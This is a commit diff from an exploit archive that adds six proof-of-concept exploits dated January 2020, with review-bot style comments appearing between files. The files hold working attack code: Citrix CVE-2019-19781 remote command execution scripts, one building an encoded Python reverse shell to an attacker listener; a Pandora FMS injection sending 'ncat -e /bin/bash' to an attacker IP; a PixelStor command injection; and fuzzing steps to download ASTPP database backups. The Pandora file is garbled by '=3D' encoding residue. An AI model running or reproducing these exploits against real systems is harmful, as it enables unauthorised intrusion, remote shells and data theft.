DB: 2020-01-11
6 changes to exploits/shellcodes TotalAV 2020 4.14.31 - Privilege Escalation Pandora 7.0NG - Remote Code Execution PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution ASTPP 4.0.1 VoIP Billing - Database Backup Download Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC) Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution
This commit is contained in:
parent
de1e6651e0
commit
d3ca859971
7 changed files with 358 additions and 0 deletions
56
exploits/linux/webapps/47900.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: ASTPP 4.0.1 VoIP Billing - Database Backup Download
|
||||
# Date: 2019-11-18
|
||||
# Exploit Author: Fabien AUNAY
|
||||
# Vendor Homepage: https://www.astppbilling.org/
|
||||
# Software Link: https://github.com/iNextrix/ASTPP/tree/v4.0.1
|
||||
# Version: 4.0.1 vendor default setup script
|
||||
# Tested on: Debian 9 - CentOS 7
|
||||
# CVE : -
|
||||
|
||||
###########################################################################################################
|
||||
ASTPP 4.0.1 VoIP Billing Unauthenticated Predictable database backup download
|
||||
|
||||
A Smart TelePhony Platform for Individual Business, Wholesale and Residential VoIP Service Providers!
|
||||
It is available as an open source solution. It means without any investment, one can start his telephony
|
||||
business using ASTPP.
|
||||
ASTPP, being one of the most powerful VoIP Billing Software, thrives to benefit its users by providing a
|
||||
comprehensive telephony solution. This open source solution has lifted itself up from a mere VoIP billing
|
||||
solution to “A Smart TelePhony Platform”.
|
||||
The latest version of ASTPP is provisioned with some advanced functional modules which are designed
|
||||
to eliminate the need of multiple solutions to run a VoIP business. It has integrated hosted IP PBX, Class
|
||||
4/5 Softswitch, and complete invoicing and billing solution developed by leveraging Smart
|
||||
Technology.
|
||||
|
||||
When administrator performs a ASTPP backup in web interface (Configuration / Database Restore / Create)
|
||||
the file name follows a semi-predictable pattern located in /var/www/html/astpp/database_backup/.
|
||||
|
||||
The file name can be FUZZED for data exfiltration with the following pattern: astpp_20200110080136.sql.gz
|
||||
|
||||
Pattern review:
|
||||
- astpp_
|
||||
- year
|
||||
- month
|
||||
- day
|
||||
- 6 PIN digit
|
||||
|
||||
Steps:
|
||||
Objective 1 : Generate your 6 PIN list
|
||||
Objective 2 : FUZZ the target URL
|
||||
Objective 3 : Download the mysqldump
|
||||
|
||||
###########################################################################################################
|
||||
|
||||
Objective 1: Generate your 6 PIN list
|
||||
POC: crunch 6 6 0123456789 > pin_fuzzer.list
|
||||
|
||||
Objective 2 : FUZZ the target URL
|
||||
POC: wfuzz --hc 302 -w pin_fuzzer.list 'http://127.0.0.1/database_backup/astpp_20200110FUZZ.sql.gz'
|
||||
===================================================================
|
||||
ID Response Lines Word Chars Payload
|
||||
===================================================================
|
||||
|
||||
000080137: 200 1135 L 6859 W 550239 Ch "080136"
|
||||
|
||||
Objective 3 : Download the mysqldump
|
||||
POC: wget http://127.0.0.1/database_backup/astpp_20200110080136.sql.gz
|
||||
astpp_20200110080136.sql.gz 100%[===============================================================================>] 296,70K 1,05MB/s ds 0,3
|
23
exploits/multiple/webapps/47901.sh
Executable file
|
@ -0,0 +1,23 @@
|
|||
#!/bin/bash
|
||||
# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
|
||||
# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
|
||||
# Release Date : 11/01/2020
|
||||
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
|
||||
echo "=================================================================================
|
||||
___ _ _ ____ ___ _ _
|
||||
| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
|
||||
| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
|
||||
|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
|
||||
|__/ CVE-2019-19781
|
||||
================================================================================="
|
||||
##############################
|
||||
if [ -z "$1" ];
|
||||
then
|
||||
echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
|
||||
exit;
|
||||
fi
|
||||
filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
|
||||
curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
|
||||
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
|
||||
echo -ne "Command Output :\n"
|
||||
curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
|
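Review bot: The header comment block (lines 2–5 of the file) never states that the script leaves an artifact on the target: the first curl writes `/netscaler/portal/templates/$filenameid.xml` and nothing removes it, whereas 47902.py in the same commit at least prints the two cleanup locations. A header line such as `# Leaves <filenameid>.xml under /netscaler/portal/templates/ on the target; it is not removed` would make the side effect visible to anyone reading the archive, and would also name the on-host indicator a defender can look for. On style, `echo -ne` is non-portable and `exit;` carries no status; `printf '%s\n' 'Usage : …' >&2; exit 2` and `printf '\n'` read the same under any `sh`, and `tr -dc 'a-zA-Z0-9' </dev/urandom | fold -w 32 | head -n 1` drops the useless `cat`.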
132
exploits/multiple/webapps/47902.py
Executable file
|
@ -0,0 +1,132 @@
|
|||
#!/usr/bin/python3
|
||||
#
|
||||
# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
|
||||
#
|
||||
# You only need a listener like netcat to catch the shell.
|
||||
#
|
||||
# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White
|
||||
#
|
||||
# Tool Written by: Rob Simon and David Kennedy
|
||||
|
||||
import requests
|
||||
import urllib3
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
|
||||
import random
|
||||
import string
|
||||
import time
|
||||
from random import randint
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
# random string generator
|
||||
def randomString(stringLength=10):
|
||||
letters = string.ascii_lowercase
|
||||
return ''.join(random.choice(letters) for i in range(stringLength))
|
||||
|
||||
# our random string for filename - will leave artifacts on system
|
||||
filename = randomString()
|
||||
randomuser = randomString()
|
||||
|
||||
# generate random number for the nonce
|
||||
nonce = randint(5, 15)
|
||||
|
||||
# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script
|
||||
# note that the file location will be in /netscaler/portal/templates/filename.xml
|
||||
def stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):
|
||||
|
||||
# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)
|
||||
encoded = ""
|
||||
i=0
|
||||
text = ("""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" % (attackerip, attackerport))
|
||||
while i < len(text):
|
||||
encoded = encoded + "chr("+str(ord(text[i]))+") . "
|
||||
i += 1
|
||||
encoded = encoded[:-3]
|
||||
payload="[% template.new({'BLOCK'='print readpipe(" + encoded + ")'})%]"
|
||||
headers = (
|
||||
{
|
||||
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
|
||||
'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),
|
||||
'NSC_NONCE' : '%s' % (nonce),
|
||||
})
|
||||
|
||||
data = (
|
||||
{
|
||||
"url" : "127.0.0.1",
|
||||
"title" : payload,
|
||||
"desc" : "desc",
|
||||
"UI_inuse" : "a"
|
||||
})
|
||||
|
||||
url = ("https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl" % (victimip, victimport))
|
||||
requests.post(url, data=data, headers=headers, verify=False)
|
||||
|
||||
# this is our second stage that triggers the exploit for us
|
||||
def stage2(filename, randomuser, nonce, victimip, victimport):
|
||||
headers = (
|
||||
{
|
||||
'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',
|
||||
'NSC_USER' : '%s' % (randomuser),
|
||||
'NSC_NONCE' : '%s' % (nonce),
|
||||
})
|
||||
|
||||
requests.get("https://%s:%s/vpn/../vpns/portal/%s.xml" % (victimip, victimport, filename), headers=headers, verify=False)
|
||||
|
||||
|
||||
# start our main code to execute
|
||||
print('''
|
||||
|
||||
.o oOOOOOOOo OOOo
|
||||
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
|
||||
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
|
||||
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
|
||||
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
|
||||
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
|
||||
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
|
||||
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
|
||||
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
|
||||
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
|
||||
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
|
||||
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
|
||||
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
|
||||
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
|
||||
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
|
||||
`$" `OOOO' `O"Y ' `OOOO' o .
|
||||
. . OP" : o .
|
||||
:
|
||||
|
||||
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
|
||||
Tool Written by: Rob Simon and Dave Kennedy
|
||||
Contributions: The TrustedSec Team
|
||||
Website: https://www.trustedsec.com
|
||||
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
|
||||
|
||||
This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
|
||||
to append files in an XML format to the victim machine. This in turn allows for remote code execution.
|
||||
|
||||
Be sure to cleanup these two file locations:
|
||||
/var/tmp/netscaler/portal/templates/
|
||||
/netscaler/portal/templates/
|
||||
|
||||
Usage:
|
||||
|
||||
python citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\n''')
|
||||
|
||||
# parse our commands
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
|
||||
parser.add_argument("targetport", help="the target server web port (normally on 443)")
|
||||
parser.add_argument("attackerip", help="the attackers reverse listener IP address")
|
||||
parser.add_argument("attackerport", help="the attackersa reverse listener port")
|
||||
args = parser.parse_args()
|
||||
print("[*] Firing STAGE1 POST request to create the XML template exploit to disk...")
|
||||
print("[*] Saving filename as %s.xml on the victim machine..." % (filename))
|
||||
# trigger our first post
|
||||
stage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)
|
||||
print("[*] Sleeping for 2 seconds to ensure file is written before we call it...")
|
||||
time.sleep(2)
|
||||
print("[*] Triggering GET request for the newly created file with a listener waiting...")
|
||||
print("[*] Shell should now be in your listener... enjoy. Keep this window open..")
|
||||
print("[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/")
|
||||
# trigger our second post
|
||||
stage2(filename, randomuser, nonce, args.target, args.targetport)
|
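Review bot: `stage1` accepts `randomuser` but never reads it, so either the parameter should be dropped from the signature and the call on the last line, or a comment should say it is kept for symmetry with `stage2`. The manual index loop that builds `encoded` and the trailing `encoded[:-3]` slice are a style point: `encoded = " . ".join("chr(%d)" % ord(c) for c in text)` expresses the same transformation in one line without the off-by-three cleanup. The cleanup paths are only printed in the banner and the final `[!]` line; repeating them in the module header comment would make the side effects of running the tool visible before it is run.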
71
exploits/php/webapps/47898.py
Executable file
|
@ -0,0 +1,71 @@
|
|||
# Exploit Title: Pandora 7.0NG - Remote Code Execution
|
||||
# Date: 2019-11-14
|
||||
# Exploit Author: Askar (@mohammadaskar2)
|
||||
# CVE: CVE-2019-20224
|
||||
# Vendor Homepage: https://pandorafms.org/
|
||||
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
|
||||
# Version: v7.0NG
|
||||
# Tested on: CentOS 7.3 / PHP 5.4.16
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if len(sys.argv) !=3D 6:
|
||||
print("[+] Usage : ./exploit.py target username password ip port")
|
||||
exit()
|
||||
|
||||
target =3D sys.argv[1]
|
||||
username =3D sys.argv[2]
|
||||
password =3D sys.argv[3]
|
||||
ip =3D sys.argv[4]
|
||||
port =3D int(sys.argv[5])
|
||||
|
||||
request =3D requests.session()
|
||||
|
||||
login_info =3D {
|
||||
"nick": username,
|
||||
"pass": password,
|
||||
"login_button": "Login"
|
||||
}
|
||||
|
||||
login_request =3D request.post(
|
||||
target+"/pandora_console/index.php?login=3D1",
|
||||
login_info,
|
||||
verify=3DFalse,
|
||||
allow_redirects=3DTrue
|
||||
)
|
||||
|
||||
resp =3D login_request.text
|
||||
|
||||
if "User not found in database" in resp:
|
||||
print("[-] Login Failed")
|
||||
exit()
|
||||
else:
|
||||
print("[+] Logged In Successfully")
|
||||
|
||||
print("[+] Sending crafted graph request ..")
|
||||
|
||||
body_request =3D {
|
||||
"date": "0",
|
||||
"time": "0",
|
||||
"period": "0",
|
||||
"interval_length": "0",
|
||||
"chart_type": "netflow_area",
|
||||
"max_aggregates": "1",
|
||||
"address_resolution": "0",
|
||||
"name": "0",
|
||||
"assign_group": "0",
|
||||
"filter_type": "0",
|
||||
"filter_id": "0",
|
||||
"filter_selected": "0",
|
||||
"ip_dst": "0",
|
||||
"ip_src": '";ncat -e /bin/bash {0} {1} #'.format(ip, port),
|
||||
"draw_button": "Draw"
|
||||
}
|
||||
|
||||
draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
|
||||
on/netflow/nf_live_view&pure=3D0"
|
||||
print("[+] Check your netcat ;)")
|
||||
request.post(draw_url, body_request)
|
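Review bot: The file as committed carries quoted-printable residue — every `=` appears as `=3D` (`!=3D 6`, `target =3D sys.argv[1]`, `verify=3DFalse`) and the `draw_url` assignment is split by a soft line break ending in `=` — so it does not parse as Python and should be re-decoded from the submission before archiving. The `#!/usr/bin/python3` shebang sits after the advisory header rather than on line 1, so it has no effect; either move it to the top or drop it and state the interpreter in the header, e.g. `# Requires: Python 3`.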
35
exploits/php/webapps/47899.py
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: PixelStor 5000 - Remote Code Execution
|
||||
# Product: PixelStor 5000
|
||||
# Vendor: Rasilient
|
||||
# Date: 2020-01-08
|
||||
# Exploit Author: .:UND3R:.
|
||||
# Vendor Homepage: http://rasilient.com
|
||||
# Version: K:4.0.1580-20150629 (KDI Version)
|
||||
# Tested on: K:4.0.1580-20150629 (KDI Version)
|
||||
# CVE: CVE-2020-6756
|
||||
# URL Author: https://pwnedchile.com
|
||||
# Thanks: Dani Pelotocino <3, Roit
|
||||
|
||||
import requests, sys
|
||||
|
||||
def poc(target, cmd):
|
||||
url = target + "/Option/languageOptions.php"
|
||||
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
|
||||
data = {"lang": ";" + cmd + ";/bin/echo -n en"}
|
||||
r = requests.post(url, headers=headers, data=data)
|
||||
if(r.status_code == 200):
|
||||
print("\nPwned :]")
|
||||
else:
|
||||
print("\nNot vulnerable :(")
|
||||
|
||||
print("PixelStor 5000 RCE exploit\nVersion: K:4.0.1580-20150629 (KDI Version)\n\nAuthor: .:UND3R:.\nURL: https://pwnedchile.com\nThanks: Dani Pelotocino <3")
|
||||
|
||||
if len(sys.argv) !=2:
|
||||
print("\n[+] Usage: python " + sys.argv[0] + " <url>\n")
|
||||
sys.exit(1)
|
||||
|
||||
if __name__ == "__main__":
|
||||
url = sys.argv[1]
|
||||
cmd = raw_input("\n[Linux Command]:")
|
||||
poc(url, cmd)
|
||||
#EoF
|
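Review bot: The `len(sys.argv) != 2` usage check runs at import time, outside the `if __name__ == "__main__":` guard that follows it, so importing the module exits the process; moving the check under the guard keeps the guard meaningful. The header gives no interpreter, yet `raw_input` exists only in Python 2; add `# Requires: Python 2 (raw_input)` to the header or use `input` if Python 3 is intended. `if(r.status_code == 200):` is a style point — `if r.status_code == 200:` is the idiomatic form.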
35
exploits/windows/local/47897.txt
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: TotalAV 2020 4.14.31 - Privilege Escalation
|
||||
# Date: 2020-01-09
|
||||
# Exploit Author: Kusol Watchara-Apanukorn
|
||||
# Vendor Homepage: https://www.totalav.com/
|
||||
# Version: 4.14.31
|
||||
# Fixed on: 5.3.35
|
||||
# Tested on: Windows 10 x64
|
||||
# CVE : N/A
|
||||
|
||||
# Vulnerability Description:
|
||||
# TotalAV 2020 4.14.31 has quarantine flaw that allows attacker escape of
|
||||
# privilege by using NTFS directory junction.
|
||||
|
||||
**You can download vulnerability version with this link:
|
||||
https://install.protected.net/windows/cdn3/4.14.31/TotalAV_Setup.exe
|
||||
|
||||
///////////////////////////////////
|
||||
Proof of Concept
|
||||
//////////////////////////////////
|
||||
1. Plant the malicious file in this case we use DLL file
|
||||
2. To exploit the vulnerability antivirus must detect the malicious dll
|
||||
3. Move it to quarantine.
|
||||
4. Attacker must create NTFS directory junction to restore
|
||||
|
||||
Full step: https://www.youtube.com/watch?v=88qeaLq98Gc
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
17 Oct, 19 : Found Vulnerability
|
||||
18 Oct, 19 : Vendor Notification
|
||||
18 Oct, 19 : Request CVE
|
||||
21 Oct, 19 : Vendor Response
|
||||
mid Dec, 19 : Vendor released new patched (v5.3.35)
|
||||
09 Jan, 20: Vulnerability Disclosure
|
|
@ -10887,6 +10887,7 @@ id,file,description,date,author,type,platform,port
|
|||
47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
|
||||
47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows,
|
||||
47896,exploits/xml/local/47896.txt,"MSN Password Recovery 1.30 - XML External Entity Injection",2020-01-09,ZwX,local,xml,
|
||||
47897,exploits/windows/local/47897.txt,"TotalAV 2020 4.14.31 - Privilege Escalation",2020-01-10,"Kusol Watchara-Apanukorn",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42197,3 +42198,8 @@ id,file,description,date,author,type,platform,port
|
|||
47892,exploits/java/webapps/47892.txt,"Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape",2020-01-08,hantwister,webapps,java,
|
||||
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
|
||||
47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
|
||||
47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
|
||||
47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
|
||||
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
|
||||
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
|
||||
47902,exploits/multiple/webapps/47902.py,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution",2020-01-11,TrustedSec,webapps,multiple,
|
||||
|
|
|